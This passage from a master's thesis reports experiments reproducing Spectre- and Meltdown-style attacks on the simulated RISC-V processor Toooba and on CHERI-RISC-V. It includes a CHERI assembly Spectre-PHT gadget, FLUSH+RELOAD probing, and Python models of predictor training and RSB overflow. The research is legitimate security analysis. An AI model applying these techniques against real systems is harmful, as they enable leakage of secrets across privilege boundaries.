scope of this work. The four Spectre attacks, Meltdown-US, and Meltdown-

GP will be the main target of this work.


Chapter 3

Methods

In this chapter, I describe the resources I used to conduct my experiments.

Furthermore, I explain which research methods I applied for which part of

this work. The last part of this chapter describes common methods I used and how the actual measurements were conducted.

3.1 Toooba

The experiments presented in Chapters 4 and 5 are conducted on CHERI’s

fork of the out-of-order processor Toooba. Toooba itself was developed by Bluespec Inc., which added compressed instructions support for debugging to MIT’s RISCY-OOO [46], a framework that allows parameterisable configuration of the processor to be built. RISCY-OOO is written in the Bluespec SystemVerilog Hardware Description Language (HDL), which allows configuration to be conducted more easily. Bluespec HDL code can be simulated directly or can be compiled to Verilog code, which can then be simulated by a Verilog simulator or used to produce an FPGA image. For all my experiments, I compiled Toooba’s code to Verilog code using the open-source Bluespec compiler¹ (release 2020.02). I used the verilator simulator² (version 3.916) in order to produce the results presented in Chapters 4 and 5.

Figure 3.1 shows the parameterisable RISCY-OOO pipeline that is used in

Toooba. The pipeline can be divided into three separate parts: Fetch, Execute,

and Commit. In this figure, the Fetch stage includes decoding and renaming as

well, which is not the case in conventional models of the pipeline, e.g. by Pat-

terson and Hennessy [14]. This part is also called the front-end of Toooba and

¹ available at https://github.com/B-Lang-org/bsc
² available at https://github.com/verilator/verilator


[Figure 3.1: block diagram of the pipeline, divided into Fetch, Execute, and Commit. Labelled blocks: Fetch 1, Fetch 2, Fetch 3, Decode, Rename, issue queues (IQ), ALU, FPU, MEM, Commit, Reorder Buffer, Register File/Forwarding, I$, D$, TLB, and BTB; annotations n and n/2.]

Figure 3.1: The parameterisable RISCY-OOO pipeline. In my configuration, I chose n=2, which means that Toooba has two ALU pipelines, one FPU pipeline, and one memory pipeline.³

instructions are handled in-order in this part. The rename stage puts instruc-

tions in the reservation stations of the respective pipelines of which Toooba

has three: the Arithmetic Logic Unit (ALU) pipeline, the Floating Point Unit

(FPU) pipeline, and the memory pipeline. The ALU pipeline can handle n

instructions per cycle, the FPU pipeline n/2 instructions per cycle, and the

memory pipeline one instruction per cycle. The Execute part of Toooba in-

cluding all three pipelines is completely out-of-order and can execute instruc-

tions as soon as all operands are available to it. In my configuration of Toooba,

I chose n = 2, which means that Toooba can fetch, decode, rename, issue, and

retire 2 instructions in one cycle if no bubbles appear in the pipeline, e.g.,

misprediction may cause Toooba not to be able to commit any instruction for

multiple cycles. Toooba has two ALU pipelines, one FPU pipeline, and one

memory pipeline in my configuration. Processors that can execute more than

one instruction per clock cycle are called superscalar processors. In my instantiation, Toooba is a two-way superscalar processor because it can execute two instructions per cycle.

Furthermore, I used the TEST cache configuration, which determines the

following settings: The L1 data and instruction cache are each 2 KiB large and

³ This figure is borrowed from the CHERI team.


Parameter                   Value
Out-of-order window size    64
L1 size                     2 KiB
L2 size                     8 KiB
L1/L2 ways                  2
Cache line size             64 bytes
Load Queue size             24
Store Queue size            14
Store Buffer size           4

Table 3.1: The parameters of the Toooba configuration used for my experi-

ments.

2-way associative, the L2 cache has a size of 8 KiB and is 2-way associative

as well, and cache lines are 64 bytes long. Toooba has a window of 64 instruc-

tions that can be executed out-of-order and the memory queues (load queue,

store queue, store buffer) are capable of tracking 38 outstanding memory in-

structions. Toooba supports Sv39, which means that virtual addresses are 39

bits long. These data are summarised in Table 3.1.

In order to successfully conduct Spectre-BTB attacks as presented in Chapters 4 and 5, I needed to make changes to Toooba’s BTB. Before my changes, Toooba did not use a hashing function for the tag, but used the entire address. I implemented a hashing function, which is described in Section 5.1.3 as it constitutes a contribution to the research platform. Having a hashing function for tags in the BTB is a common mechanism used in industry [22]. Therefore, I consider my changes to Toooba’s BTB not a simplification of my work, but rather an adaptation to real-world setups.

3.2 Research Methodology

In this master’s thesis work, I used quantitative research methods in order to

prove the hypothesis of transient-execution attacks being feasible on Toooba.

Transient-execution attacks are reproduced in assembly and C code. I rely on the compilation toolchain, including the compiler, linker, and assembler, to be correct in order to produce meaningful results. The success of an attack is determined by whether the access time to certain memory locations is significantly shorter than to others. For all attempted attacks, I used the verilator

simulator, which generates a cycle-accurate model of Toooba’s Verilog code.

In order for my results to be meaningful, I rely on the verilator simulation to


be correct. Furthermore, I explain why an attack does or does not work on Toooba using quantitative methods, as simulation gives clear and objective evidence of which actions Toooba takes in a given scenario.

In the discussion of the different transient-execution attacks, I mainly use

quantitative research methods as well. Some Spectre-style attacks are run with a mitigation mechanism enabled, giving quantitative results on whether a specific attack is successful or not. However, I also use qualitative methods in order to describe the impact of certain attack classes. The impact of an attack is determined by the threat model. Defining threat models and evaluating the corresponding threats requires judgement and cannot be expressed in objective and quantitative data.

3.3 Common Mechanisms

This section summarises common techniques used to conduct or prepare the experiments in Chapters 4 and 5.

3.3.1 Flushing Caches

Flushing caches is used by transient-execution attacks for two reasons. First, flushing caches, or evicting a specific cache line, leads to longer miss penalties for loads and more accurate timing analysis. Second, flushing caches provides a clean state before conducting timing measurements. As explained in Chapters 4 and 5, attackers want the processor to misspeculate and want the time span until the misprediction is discovered and the instructions are rolled back to be as long as possible. This can be achieved by making load requests go all the way to memory without hitting any of the caches. As described in Section 3.3.2, probing the caches needs a clean state in order to achieve reliable results.

As stated in Table 3.1, Toooba’s L1 data cache in the TEST configuration

has space for 2 KiB and the L2 cache has space for 8 KiB. RISC-V does not

have a dedicated flush instruction and CHERI-RISC-V does not provide one

either [11, 12, 37]. This means that attackers need to implement their own

flush functions. I implemented a function that loads an entire memory region into the caches and therefore evicts the content previously present. This function issues one load per 64 bytes, since each load brings the entire corresponding cache line into the cache.
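The eviction-based flush described above can be illustrated with a small software model. This is a minimal sketch in Python and not the thesis code: the cache model, the LRU replacement policy, the eviction region address, and the names `SetAssocCache` and `flush_by_eviction` are assumptions made for illustration. Only the sizes (2 KiB, 2 ways, 64-byte lines) are taken from Table 3.1.

```python
LINE = 64  # cache line size in bytes (Table 3.1)


class SetAssocCache:
    """Toy set-associative cache with LRU replacement (assumed policy)."""

    def __init__(self, size=2048, ways=2, line=LINE):
        self.line = line
        self.ways = ways
        self.num_sets = size // (ways * line)
        # Each set is a list of line addresses, most recently used last.
        self.sets = [[] for _ in range(self.num_sets)]

    def _locate(self, addr):
        line_addr = addr // self.line
        return line_addr, self.sets[line_addr % self.num_sets]

    def contains(self, addr):
        line_addr, entries = self._locate(addr)
        return line_addr in entries

    def load(self, addr):
        """Access addr; return True on a hit, False on a miss."""
        line_addr, entries = self._locate(addr)
        hit = line_addr in entries
        if hit:
            entries.remove(line_addr)
        elif len(entries) == self.ways:
            entries.pop(0)  # evict the least recently used line
        entries.append(line_addr)
        return hit


def flush_by_eviction(cache, region_base, region_size):
    """Evict earlier content by touching one address per cache line."""
    for addr in range(region_base, region_base + region_size, cache.line):
        cache.load(addr)


l1 = SetAssocCache()
l1.load(0x80001100)                      # line that should be evicted
flush_by_eviction(l1, 0x80100000, 2048)  # hypothetical eviction region
print(l1.contains(0x80001100))           # False
```

In this model, a region as large as the cache suffices because every set receives as many new lines as it has ways. A real implementation may need a larger region, depending on the replacement policy and the cache hierarchy.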


3.3.2 Timing Measurements

For the attacks presented in Chapters 4 and 5, I always use the same mech-

anism in order to prove that an attack has been conducted successfully. The

code under attack will speculatively load a value into the core. This value is used as an index into an array shared between victim and attacker. Probing the

access times to values in this shared array will allow the attacker to recover the

original secret. Throughout all my experiments, I use FLUSH+RELOAD [18],

which is an access-driven technique. In order to successfully probe the cache,

the attacker evicts all cache lines of the array to probe – the flush phase – and

then starts the attack. As a result, the only cache line of the shared array present in the cache is the one that was speculatively accessed to reveal the secret.

As a next step, the attacker accesses value after value in the shared array

and measures the time it takes to access the array as precisely as possible –

the reload phase. The attacker probes at the granularity of cache lines, which means at a granularity of 64 bytes in Toooba. The results of probing the memory addresses [0x80001000, 0x800017ff] are depicted in Figure 3.2. As follows from Table 3.1 (2 KiB divided by 64 bytes per line), Toooba’s L1 data cache has 32 lines, which are indexed by [0, ..., 31]. This number of cache lines exactly matches the 0x800 bytes that the attacker wants to probe in steps of 64 bytes.

In the example in Figure 3.2, the victim code has speculatively accessed a double-word at the address 0x80001100. The data reflect this exactly, as the cache line with index four ((0x80001100 − 0x80001000) / 64 = 4) has a significantly shorter access time than all other cache lines. All other memory accesses except the very first one require roughly 30 cycles with only small variations. However, the first memory access is significantly slower, needing 60 cycles. This can be explained by the cold branch predictor in the assembly code of the probe function. The cold branch predictor makes Toooba load instructions from a cache line that is not present, which leads to this delay.
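The evaluation of the reload phase can be sketched as follows. This is a minimal Python illustration and not the measurement code used in the thesis. The timing values are hypothetical: the 60 and 30 cycles follow the description above, while the 5 cycles for the cached line and the helper names `line_index` and `fastest_line` are assumptions.

```python
PROBE_BASE = 0x80001000  # start of the probed region in the text
LINE = 64                # cache line size in bytes


def line_index(addr, base=PROBE_BASE, line=LINE):
    """Cache line number of addr within the probed region."""
    return (addr - base) // line


def fastest_line(cycles):
    """Index of the probe with the shortest access time."""
    return min(range(len(cycles)), key=lambda i: cycles[i])


# Hypothetical measurements: 60 cycles for the first probe, about 30 for
# ordinary misses, and an assumed 5 cycles for the one cached line.
cycles = [60] + [30] * 31
cycles[line_index(0x80001100)] = 5

hit = fastest_line(cycles)
print(hit, hex(PROBE_BASE + hit * LINE))  # 4 0x80001100
```

Taking the minimum is sufficient here because the slow first probe is an outlier in the opposite direction. With noisier measurements, a threshold between hit and miss latency would be the more robust choice.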

The attacker can only measure the presence of a certain cache line, but not which exact address caused the cache line to be loaded. This means that the attacker can only leak a very limited number of bits per probing attack.

In my work, I do not use cache bank collision attacks as described in [47].

Therefore, the only information the attacker can gain is which cache line has

been accessed compared to all possible cache lines.

$$\log_2(\#\text{cache lines}) = \log_2(32) = 5\ \text{bits} \qquad (3.1)$$

Equation 3.1 shows the amount of information an attacker gains in general


[Figure 3.2: plot of Cycles Needed (y-axis, 0 to 60) against Cache Line Number (x-axis, 0 to 28).]

Figure 3.2: Results of probing the L1 cache after an attack has been conducted.

and the exact number in my configuration of Toooba. In order to recover more than five bits, an attacker needs to conduct the attack multiple times; e.g., recovering a full 64-bit double-word requires ⌈64/5⌉ = 13 attacks. The speed of leaking values determines the success of real-world attacks [22, 27]. However, this is out of scope for this thesis work. In Chapters 4

and 5, I present attacks attempted and whether they have been conducted suc-

cessfully, which implies that they are capable of leaking information, but no

claims about the speed and implications of their impact on real-world attacks

are made.
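The arithmetic behind Equation 3.1 and the number of required attack rounds can be checked with a few lines of Python. This is only an illustrative sketch; the function names `bits_per_probe` and `attacks_needed` are my own and do not appear in the test framework.

```python
import math


def bits_per_probe(num_lines):
    """Information gained by learning which one of num_lines was accessed."""
    return math.log2(num_lines)


def attacks_needed(secret_bits, num_lines):
    """Number of probing attacks needed to recover secret_bits bits."""
    return math.ceil(secret_bits / bits_per_probe(num_lines))


print(bits_per_probe(32))      # 5.0
print(attacks_needed(64, 32))  # 13
```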


Chapter 4

RISC-V Results

In this chapter, I describe the results obtained by reproducing the different

transient-execution attacks described in Chapter 2 on RISC-V Toooba. To my

knowledge, this work is the first one to reproduce all four Spectre-style attacks

on a RISC-V processor. All attacks together build an extensible framework

for exploring transient-execution attacks on RISC-V processors, which con-

stitutes a platform for further research not only on Toooba, but on any other

vulnerable processor. An extension to the framework is contributed by the

work described in Chapter 5, which extends all Spectre-style RISC-V attacks

to CHERI-RISC-V attacks and adds new Meltdown-style attacks. Describing

the reasons for the success or failure of Spectre-style attacks in both this chap-

ter and the chapter about the CHERI-RISC-V results would introduce many

redundancies. Therefore, I give only a high-level explanation for most attacks in this chapter and examine Toooba’s pipeline in depth in the following chapter.

4.1 Spectre Attacks

This section contains the Spectre-style attacks attempted on RISC-V Toooba

in assembly and C. The results are depicted in Table 4.1. An entry marked

with (✓) means that this attack was conducted successfully, (✗) means that I

could not craft a successful attack. An entry marked with (-) indicates that I

did not attempt an attack at all. All attacks could be reproduced successfully

in RISC-V assembly. In order to prove the general applicability, the Spectre-

PHT, Spectre-BTB, Spectre-RSB, and Spectre-STL-Load attacks have been

reproduced in C as well.


                      asm   C
Spectre-PHT           ✓     ✓
Spectre-PHT-Write     ✓     -
Spectre-BTB           ✓     ✓
Spectre-RSB           ✓     ✓
Spectre-STL-Load      ✓     ✓
Spectre-STL-Jump      ✓     -

Table 4.1: Overview of attempted Spectre-style attacks on RISC-V Toooba

and whether they were successful.

4.1.1 Spectre-PHT

The reproduction of Spectre-PHT in both RISC-V assembly and C was conducted as described in [22]. The key step of a Spectre-PHT attack is to train the branch direction predictor. The RISCY-OOO processor implements multiple branch direction predictors. Toooba uses a tournament predictor, which consists of one local and one global predictor. Both the local and the global predictor have their own Branch History Table (BHT). A two-bit selector determines which of these two predictors is used for the actual response of the tournament predictor. The goal of the attack is to train the prediction

for the branch-greater-equal (bge) instruction such that it predicts

not taken when the actual attack will be conducted. To achieve that, attack-

ers have two options. They can either train the global predictor to return not

taken for that particular branch or they can train the local predictor to return

not taken. The attacker has to keep in mind that it is important to train the

selector accordingly as well. In Section 5.1.1, I explain thoroughly how I train

the tournament predictor in order to achieve a successful attack. The principle

of training remains the same over all Spectre-PHT attacks I conducted.
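The effect of training a tournament predictor can be illustrated with a generic textbook model. The following Python sketch is not a model of Toooba’s actual predictor: the table organisation, the four-bit global history, the selector update rule, and the branch address are assumptions made for illustration. It only shows that repeated not-taken executions drive the combined prediction to not taken, even if the branch was taken before.

```python
class Counter2:
    """Two-bit saturating counter; values 2 and 3 mean 'taken'."""

    def __init__(self, value=0):
        self.value = value

    def taken(self):
        return self.value >= 2

    def update(self, taken):
        if taken:
            self.value = min(3, self.value + 1)
        else:
            self.value = max(0, self.value - 1)


class TournamentPredictor:
    def __init__(self):
        self.local = {}     # per-branch counters, keyed by pc
        self.global_ = {}   # counters keyed by global history
        self.selector = {}  # per-branch; 'taken' selects the global predictor
        self.history = 0    # outcomes of the last four branches

    def _entries(self, pc):
        return (self.local.setdefault(pc, Counter2()),
                self.global_.setdefault(self.history, Counter2()),
                self.selector.setdefault(pc, Counter2()))

    def predict(self, pc):
        local, glob, sel = self._entries(pc)
        return glob.taken() if sel.taken() else local.taken()

    def update(self, pc, taken):
        local, glob, sel = self._entries(pc)
        local_ok = local.taken() == taken
        global_ok = glob.taken() == taken
        if local_ok != global_ok:
            sel.update(global_ok)  # move towards the component that was right
        local.update(taken)
        glob.update(taken)
        self.history = ((self.history << 1) | int(taken)) & 0xF


bp = TournamentPredictor()
BGE_PC = 0x80000100      # hypothetical address of the bge instruction
for _ in range(4):       # the branch is taken a few times first
    bp.update(BGE_PC, True)
for _ in range(8):       # training calls: the branch is not taken
    bp.update(BGE_PC, False)
print(bp.predict(BGE_PC))  # False, i.e. predicted not taken
```

In this toy model the selector may end up choosing either component. What matters for the attack is only that the selected component predicts not taken when the out-of-bounds index is supplied.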

In later stages of this work, I reviewed Toooba’s branch direction predic-

tion and made the following observation. When a specific branch is predicted

for the first time by the tournament predictor, the predictor always uses the local branch prediction unit. Furthermore, the local branch predictor is initialised to predict False for the first prediction. Therefore, whenever Toooba encounters a branch for the first time, it will be predicted as False. For the Spectre-PHT attack as shown in Figure 5.1, this means that the branch prediction does

the attacker-desired action by default. Therefore, an attacker does not need

a training phase to conduct a successful attack, which I have confirmed in a


practical example of Spectre-PHT. This helps the attacker in two ways. First, the attack becomes easier as no previous training calls are needed. Second, the attacker saves time, which increases the bandwidth of a real-world attack.

4.1.2 Spectre-PHT-Write

This variant of Spectre-PHT seeks to conduct a speculative write instead of a

speculative load [34]. Out-of-bounds writes can be used to direct control-flow

to a gadget of interest for the attacker, e.g., by overwriting the return address re-

siding on the software stack. Speculatively overwriting a return address can be

the starting point of a Return-Oriented Programming (ROP) attack [48]. With

code not using capabilities, I successfully crafted an attack that overwrites the

return address such that the control-flow will be speculatively directed to a

gadget revealing a register value.

4.1.3 Spectre-BTB

Following Canella et al. [19], all Spectre-style attacks can be conducted in-place and out-of-place. However, throughout my thesis work, Spectre-BTB is the only attack where I attempted both attack types. Figure 4.1 depicts both the in-place and the out-of-place variant. On the left side, the two indirect jumps are mapped to the same BTB entry and therefore one jump can impact the prediction of the other. The exact explanation of why and how a BTB entry is aliased in Toooba is given in Section 5.1.3. On the right side of Figure 4.1, there is only one jump that trains the BTB. Depending on whether funct is called from call_0 or call_1, the jump will take different directions. Therefore, previous calls to funct impact the branch target prediction of that jump. Both attacks reach the same goal, which is training a BTB entry. I reproduced both attacks with code similar to that shown in Figure 4.1 and both attacks were successful. For the remainder of this thesis, I only use Spectre-BTB out-of-place as I believe it is more convenient for an attacker to directly poison the BTB instead of indirectly calling another function. Therefore, I will use the abbreviation Spectre-BTB for the out-of-place variant.
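Why a hashed tag makes out-of-place training possible can be shown with a toy model. The Python sketch below is purely illustrative: the hash `fold_tag` (XOR of the four address bytes), the class `ToyBTB`, and the target address are hypothetical and are not the hashing function I implemented in Toooba, which is described in Section 5.1.3. The two jump addresses are those of Figure 4.1.

```python
def fold_tag(pc):
    """Hypothetical tag hash: XOR of the four bytes of a 32-bit address."""
    tag = 0
    for shift in (0, 8, 16, 24):
        tag ^= (pc >> shift) & 0xFF
    return tag


class ToyBTB:
    """Branch target buffer looked up only by a (possibly hashed) tag."""

    def __init__(self, tag_fn):
        self.tag_fn = tag_fn
        self.targets = {}

    def train(self, pc, target):
        self.targets[self.tag_fn(pc)] = target

    def predict(self, pc):
        return self.targets.get(self.tag_fn(pc))


JUMP_A = 0x800000C8  # jr t1 in Figure 4.1
JUMP_B = 0x800202C8  # jalr t1 in Figure 4.1
GADGET = 0x80003000  # hypothetical target used for training

hashed = ToyBTB(fold_tag)
hashed.train(JUMP_A, GADGET)
print(hashed.predict(JUMP_B) == GADGET)  # True: both jumps share a tag

full = ToyBTB(lambda pc: pc)  # entire address used as tag
full.train(JUMP_A, GADGET)
print(full.predict(JUMP_B))   # None: no aliasing with full-address tags
```

With full-address tags, one jump cannot influence the prediction of a jump at a different address, which is why the out-of-place variant needs some form of tag or index aliasing.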

4.1.4 Spectre-RSB

The goal of Spectre-RSB attacks is to create a mismatch between hardware and software return addresses. In order to reproduce this attack, I created exemplary code that fetches its return address from memory and returns


Left:
    800000c8: jr t1
    ...
    800202c8: jalr t1

Right:
    call_0:
        la a0, addr_0
        jal ra, funct
        ...
    call_1:
        la a0, addr_1
        jal ra, funct
        ...
    funct:
        jr a0

Figure 4.1: Left: Spectre-BTB out-of-place, right: Spectre-BTB in-place.

to this address. This does not match the address predicted by hardware and therefore allows an attacker to alter control-flow in speculation. I conducted a similar attack for CHERI-RISC-V processors; to avoid redundancy, the attack is only explained thoroughly in Section 5.1.5.

Another option to create a mismatch between the software and hardware

return address stacks is to – if allowed by hardware – let the RSB overflow [23,

24]. In Toooba, the RSB has room for eight return addresses. If the call depth

is greater than eight function calls, the subsequent return addresses will over-

write the ones already present. This can be used by an attacker to conduct a

Spectre-RSB attack as well. I created an attack, which causes a recursive func-

tion to call itself more than eight times. This fills all entries of the RSB with

return addresses pointing to instructions in the code of the recursive function.

The returns to the recursive function will be predicted correctly, but the jump

returning to the calling function will be mispredicted and will execute parts of

the recursive function one more time, which reads out-of-bounds values in my

example.
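The overflow behaviour can be reproduced with a small model of a circular return stack buffer. This Python sketch rests on assumptions: it models the RSB as an eight-entry circular buffer that wraps around and never reports being empty, which matches the overwriting behaviour described above but is not derived from Toooba’s source code. The names `CircularRSB` and `run` are hypothetical.

```python
class CircularRSB:
    """Return stack buffer that wraps around and never reports 'empty'."""

    def __init__(self, entries=8):
        self.slots = [None] * entries
        self.top = 0  # next slot to write

    def push(self, addr):
        self.slots[self.top] = addr
        self.top = (self.top + 1) % len(self.slots)

    def pop(self):
        self.top = (self.top - 1) % len(self.slots)
        return self.slots[self.top]


def run(recursive_calls):
    """Return the list of (actual, predicted) return mispredictions."""
    rsb, stack, mispredicted = CircularRSB(), [], []

    def call(return_addr):
        rsb.push(return_addr)       # hardware return address
        stack.append(return_addr)   # software return address

    call("caller")                     # caller invokes the recursive function
    for _ in range(recursive_calls):   # the function calls itself
        call("recursive")
    while stack:
        actual, predicted = stack.pop(), rsb.pop()
        if actual != predicted:
            mispredicted.append((actual, predicted))
    return mispredicted


print(run(3))  # []
print(run(9))  # [('caller', 'recursive')]
```

As in the attack described above, all returns into the recursive function are predicted correctly, and only the final return to the caller is mispredicted as a return into the recursive function.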

4.1.5 Spectre-STL

Spectre-STL is based on memory disambiguation making wrong predictions.

I successfully conducted the attack described in Figure 2.4. Again, the repro-

duction in CHERI-RISC-V assembly is similar and therefore the exact reasons

will be described in Section 5.1.6. This attack will be referred to as Spectre-


                asm
Meltdown-US     ✗
Meltdown-GP     ✗

Table 4.2: Overview of attempted Meltdown-style attacks on RISC-V Toooba

and whether they were successful.

STL-Load. Besides revealing a secret through two loads, the attacker can pursue another goal: jumping to an arbitrary target. This attack is referred to as Spectre-STL-Jump. It is based on the same principles as Spectre-STL-Load. However, the attack requires a preparation phase in which the attacker inserts a valid code address. This code address is stored at the address whose content is loaded twice due to wrong memory disambiguation. Therefore, the load that is predicted to be independent does not load a secret value, but a valid code address. If this code address is used in a jump before Toooba recognises that its memory disambiguation was wrong, the attacker will be able to jump to an arbitrary target.
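The principle behind both Spectre-STL variants can be sketched with a simplified model of a load that bypasses an older store. The Python code below is an illustration under assumptions and does not model Toooba’s load-store queue: the function `run_load`, the addresses, and the values are hypothetical.

```python
def run_load(memory, pending_store, load_addr, predict_independent):
    """Return (transient_value, architectural_value) for a load that
    follows a store whose address is not yet resolved."""
    store_addr, store_value = pending_store
    transient = None
    if predict_independent:
        # The load bypasses the store and reads the stale memory content.
        transient = memory[load_addr]
    # The store address resolves; the store is applied in program order.
    memory[store_addr] = store_value
    architectural = memory[load_addr]
    return transient, architectural


SLOT = 0x80002000            # hypothetical address used by store and load
memory = {SLOT: 0x80004000}  # stale content: attacker-inserted code address
transient, architectural = run_load(
    memory, pending_store=(SLOT, 0x80000200), load_addr=SLOT,
    predict_independent=True)
print(hex(transient), hex(architectural))  # 0x80004000 0x80000200
```

In Spectre-STL-Jump, the stale value plays the role of the attacker-inserted code address: a jump that consumes it before the misprediction is detected is transiently directed to the attacker’s target.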

4.2 Meltdown Attacks

In this section, I describe the Meltdown-style attacks attempted on RISC-V

Toooba. The attacks and their respective outcomes are summarised in Ta-

ble 4.2, which shows that none of the attempted attacks could be conducted

successfully. However, these two attacks are an essential part of the test suite

as their analysis shows how to prevent them. Furthermore, it is important to test new implementations to ensure that no conventional Meltdown-style attack is possible.

4.2.1 Meltdown-US

For Meltdown-US, I created a scenario that resembles a system running a real operating system. In my setup, the operating system code runs in S

privilege mode and has its own code and data page. The U(ser) bit is cleared for

both S mode pages, which means that U mode code cannot access these pages.

The attacker code runs in U privilege mode and also has its own code and data

page. Similar to Meltdown-US-CHERI presented in Section 5.2.1, the attacker

tries to access data without having sufficient permission – in Meltdown-US on


[Figure 4.2: diagram with the labels ExeMem, TLB-Req, FinishMem, Check, and ReorderBuf.]

Figure 4.2: The last two stages of the Toooba memory pipeline, which perform permission and capability checks.

the granularity of 4 KiB pages.

The translation from virtual to physical addresses is conducted in the last two stages of the memory pipeline in Toooba, as shown in Figure 4.2. The ExeMem stage sends the request to the Translation Lookaside Buffer (TLB) and the FinishMem stage receives the corresponding response. Besides the physical address, the access rights are available at this stage as well. Therefore, the exception, a page fault, is recorded in the cause field of the Load-Store Queue (LSQ) entry of this memory access. This load will never be issued and thus Meltdown-US is not possible on Toooba.
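The ordering that prevents Meltdown-US, namely checking permissions before the load is issued, can be summarised in a short behavioural sketch. This Python model is an assumption-laden illustration and not a transcription of Toooba’s Bluespec code: the classes `TlbResponse` and `LsqEntry`, the function `finish_mem`, and the addresses are hypothetical, and only U-mode accesses are modelled.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class TlbResponse:
    phys_addr: int
    user: bool  # U bit of the page table entry


@dataclass
class LsqEntry:
    virt_addr: int
    phys_addr: Optional[int] = None
    cause: Optional[str] = None  # exception recorded for this access
    issued: bool = False         # whether the load was sent to the cache


def finish_mem(entry, tlb_response, mode):
    """Check access rights when the TLB response arrives."""
    if mode == "U" and not tlb_response.user:
        entry.cause = "load page fault"
        return entry  # faulting loads are never issued
    entry.phys_addr = tlb_response.phys_addr
    entry.issued = True
    return entry


# U-mode load to a supervisor page (U bit cleared): fault, no memory access.
kernel_load = finish_mem(LsqEntry(0x1000), TlbResponse(0x80010000, False), "U")
print(kernel_load.cause, kernel_load.issued)  # load page fault False

# U-mode load to a user page (U bit set): the load is issued.
user_load = finish_mem(LsqEntry(0x2000), TlbResponse(0x80020000, True), "U")
print(user_load.cause, user_load.issued)      # None True
```

Because the faulting load never reaches the data cache in this ordering, no secret-dependent value is available to a following transient instruction sequence.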

4.2.2 Meltdown-GP

The Meltdown-GP attack seeks to read a register that the code has no permission to read. In my reproduction of the Meltdown-GP attack, user mode code attempts to read the CSR mcause, which is forbidden as it is a register only accessible by M mode code. The register read is followed by a load to an attacker-accessible array in order to make the secret visible.

However, as marked in Table 4.2, the Meltdown-GP attack is not possible

on Toooba. Checking which privilege mode is necessary is done as a part of

the Rename stage in Toooba. If the necessary privilege mode is not present,

the Rename stage will modify the respective Reorder Buffer (ROB) entry so

that the cause field is set to the exception to be raised. Furthermore, the in-

struction is marked as executed in the entry, which means that it never enters

the ALU pipeline. Therefore, the result will never be produced, which miti-

gates the attack as the following transient-instruction sequence cannot reveal

the secret register value.


Chapter 5

CHERI-RISC-V Results

The main part of my thesis work was to extend my test framework to CHERI-RISC-V processors. This collection of attacks shows how to practically use the

base framework presented in Chapter 4. In this chapter, I investigate whether

CHERI mitigates transient-execution attacks and how effective CHERI is in

that case. To my knowledge, this work is the first to practically reproduce

any transient-execution attack on a CHERI-RISC-V system. The attacks pre-

sented in this chapter extend the conventional attacks presented in Chapter 4.

Furthermore, I will introduce a new transient-execution attack subclass that

allows attackers to forge arbitrary and powerful capabilities in Toooba.

5.1 Spectre Attacks

As shown in Table 5.1, I successfully reproduced all four main Spectre attacks and several applications of them on CHERI-RISC-V systems. In this section, I do not describe every attack thoroughly as some of them are very similar. In this thesis work, I carried out examples in C as well. As depicted in Table 5.1, these could be conducted successfully, but they will not be described in this section as they do not make a significant contribution to the vulnerability profile of Toooba. However, an exemplary C attack is described in Appendix A.

5.1.1 Spectre-PHT

The CHERI-assembly code of my reproduction of the Spectre-PHT attack is

depicted in Figure 5.1. This is a close reproduction of the original work by

Kocher et al. [22] that has been introduced in Section 2.2.1. The example

checks whether an index (held in a0) is less than a global comparison variable


                      CHERI asm   CHERI C
Spectre-PHT           ✓/✗         ✓/✗
Spectre-PHT-Write     ✗           -
Spectre-BTB           ✓           ✓
Spectre-RSB           ✓           ✓
Spectre-STL-Load      ✓           ✓
Spectre-STL-Jump      ✓           -
CHERI-Sandboxes       ✓           -
Priv-Mode-Regs        ✓           -
Priv-Mode-Exec        ✓           -

Table 5.1: Overview of attempted Spectre-style attacks in CHERI-RISC-V

Toooba and whether they were successful. Spectre-PHT is classed as (✓/✗) as

its success depends on the concrete capability configuration.

(stored at the address pointed to by ca2). If this is the case, an array holding

secret values (with its base address being held in ca1) will be accessed at index

a0. The resulting value will be used as the index to another array (with its base

address being held in ca3). In this example, I assume that the memory ad-

dresses pointed to by ca3 are also visible to the attacker, e.g., a shared memory

page between the victim and the attacker. Furthermore, I assume that ca1 al-

lows access to more addresses than [ca1.baseaddr, ca1.baseaddr+length−1],

where length is the global comparison value stored at the address pointed to

by ca2. This can either be caused by capabilities not being configured suit-

ably or by bounds not being exactly representable due to bounds compression

as it is done with 128-bit capabilities [38].

In my example, I decided to train Toooba’s tournament predictor to always choose the local predictor, which will then return not taken. To achieve that, I call the assembly code in Figure 5.1 eight times with values for a0 such that a0 ∈ [0, ..., 0x1f] holds. This trains the local BHT to return not taken for this particular branch and trains the selector to always choose the local predictor for this branch. My choice for the other parameters remains the same over the training phase and is shown in Table 5.2. After the training phase, the attacker can start the actual attack.

    // a0: index to secret array
    slli t1, a0, 3
    cincoffset ca1, ca1, t1    // ca1: secret array base addr.
    cld t0, 0(ca2)             // ca2: comparison value
    bge a0, t0, end
    cld t2, 0(ca1)             // access secret value
    // use spec. execution
    cincoffset ca3, ca3, t2    // ca3: shared mem. page
    cld t2, 0(ca3)
    end:
    // other code

Figure 5.1: Reproduction of the Spectre-PHT attack in CHERI assembly.

    Capability Reg   Description
    ca1              capability spanning [0x80001000, 0x80001fff]
    ca2              capability spanning [0x80002000, 0x80002007];
                     8-byte value 0x20 at this address
    ca3              capability spanning [0x80003000, 0x80003fff]

Table 5.2: Parameter configuration used for the Spectre-PHT attack.

For the actual attack, I choose the index into the secret array to be 0x40 (a0 = 0x40). For all other parameters, I use the values presented in Table 5.2. As preparation for the attack, I ensure that the load from the address stored in ca2 misses all caches. This is important to the attacker as the outstanding load poses a dependency for the following branch instruction. Because of the previous training phase, the branch bge is predicted as not taken. This means that from this point on, the code following the branch instruction runs on a mispredicted path and is therefore executed transiently. Due to the outstanding load, the misprediction cannot be resolved for the entire miss penalty time of the load. The first speculative load following the mispredicted branch instruction is a memory access to the address 0x80001200, returning the value 0x200 in my example. This value is added in the next instruction to ca3, which points to a memory region also accessible to the attacker. However, the first load was illegal because the code does not allow accesses to addresses 0x80001100 or greater. Later, Toooba will resolve this and roll back the speculatively executed instructions, but the second load to an attacker-accessible array has already been issued and can be detected by the attacker.
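The address arithmetic of this walkthrough can be replayed with a short Python sketch. It only restates the numbers from Figure 5.1 and Table 5.2. The constant and function names are illustrative assumptions and not part of the test framework.

```python
# Replays the address arithmetic of the Spectre-PHT example.
# All names are illustrative; the values come from Figure 5.1 and Table 5.2.

SECRET_BASE = 0x80001000  # lowest address covered by ca1
SECRET_TOP = 0x80001FFF   # highest address covered by ca1
COMPARE_VALUE = 0x20      # 8-byte value stored at the address held in ca2
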